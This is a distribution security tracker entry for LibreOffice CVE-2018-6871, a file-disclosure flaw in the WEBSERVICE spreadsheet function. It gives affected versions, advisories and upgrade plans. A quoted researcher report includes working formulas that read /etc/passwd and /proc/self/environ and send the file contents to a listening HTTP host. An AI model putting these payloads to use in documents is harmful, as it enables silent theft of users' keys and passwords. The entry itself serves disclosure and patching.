CLD-286 Details

Other IDs this deficiency may be known by:

CVE ID CVE-2018-6871 (nvd) (mitre) (debian) (archlinux) (red hat) (suse) (ubuntu)
Other ID(s)

Basic Information:

Affected Package(s) libreoffice
Deficiency Type SECURITY
Date Created 2018-02-09 19:10:40
Date Last Modified 2018-02-12 13:49:12

Version Specific Information:

Cucumber 1.0 i686 vulnerable
Cucumber 1.0 x86_64 vulnerable

Cucumber 1.1 i686 vulnerable
Cucumber 1.1 x86_64 vulnerable

Details:

********* THIS VULNERABILITY HAS THE DUPLICATE CVE ID OF CVE-2018-1055 *********

The ID CVE-2018-6871 should be used instead of CVE-2018-1055. See:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1055

=================================== Overview ===================================

LibreOffice through 6.0.1 allows remote attackers to read arbitrary files via
=WEBSERVICE calls in a document, which use the COM.MICROSOFT.WEBSERVICE
function.

================================ Initial Report ================================

From https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure:

Vulnerability description

CVE-2018-6871
First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

The function is required to obtain data by URL, usually used as:

=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

In original:

For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE
returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
Second part

By default the cells are not updated, but if you specify the cell type like
~error, then the cell will be updated when you open document.
Exploitation

To read file you need just:

=WEBSERVICE("/etc/passwd")

This function can also be used to send a file:

=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so
you need to retrieve current user home path.

=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Also you can parse other files too, like a ~/.ssh/config or something like
that.

For other than LibreOffice Calc formats you just need embed calc object to
other document (I checked it works).
Impact

It is easy to send any files with keys, passwords and anything else. 100%
success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all
operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in
almost all formats supporting by LO.
Acknowledgment

Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich &&
Andrew Krasichkov (according to LibreOffice team notes).

============================ Additional Information ============================

From the official LibreOffice security advisory
(https://www.libreoffice.org/about-us/security/advisories/cve-2018-1055/):

Announced: February 9, 2018

Fixed in: LibreOffice 5.4.5/6.0.1

Description:

LibreOffice Calc supports a WEBSERVICE function to obtain data by URL.
Vulnerable versions of LibreOffice allow WEBSERVICE to take a local file URL
(e.g file://) which can be used to inject local files into the spreadsheet
without warning the user. Subsequent formulas can operate on that inserted data
and construct a remote URL whose path leaks the local data to a remote
attacker.

In later versions of LibreOffice without this flaw, WEBSERVICE has now been
limited to accessing http and https URLs along with bringing WEBSERVICE URLs
under LibreOffice Calc's link management infrastructure.


All users are recommended to upgrade to LibreOffice >= 5.4.5 or >= 6.0.1

Thanks to Ronnie Goodrich and Andrew Krasichkov for discovering this flaw.

================================= Our Analysis =================================

----- Affected Products -----
Versions of LibreOffice prior to 6.0.1 and 5.4.5 are vulnerable to this
vulnerability. This includes LibreOffice as originally packaged on Cucumber
Linux 1.0 and 1.1. Versions greater than or equal to 6.0.1 or 5.4.5 are not
affected.

----- Scope and Impact of this Vulnerability -----
This vulnerability allows a remote attacker to read an arbitrary file via a
specially crafted document. All that is required from the end user is opening
the malicious document in an affected version of LibreOffice.

----- Fix for this Vulnerability -----
This vulnerability can be fixed by upgrading to LibreOffice 6.0.1 or 5.4.5.
Unfortunately, there is no patch for this vulnerability readily available, so
upgrading to one of the new versions is the only way to patch it.

================================= Our Solution =================================

We are planning to  upgrade to LibreOffice 5.4.5; however, we are experiencing
major difficulties in performing the upgrade.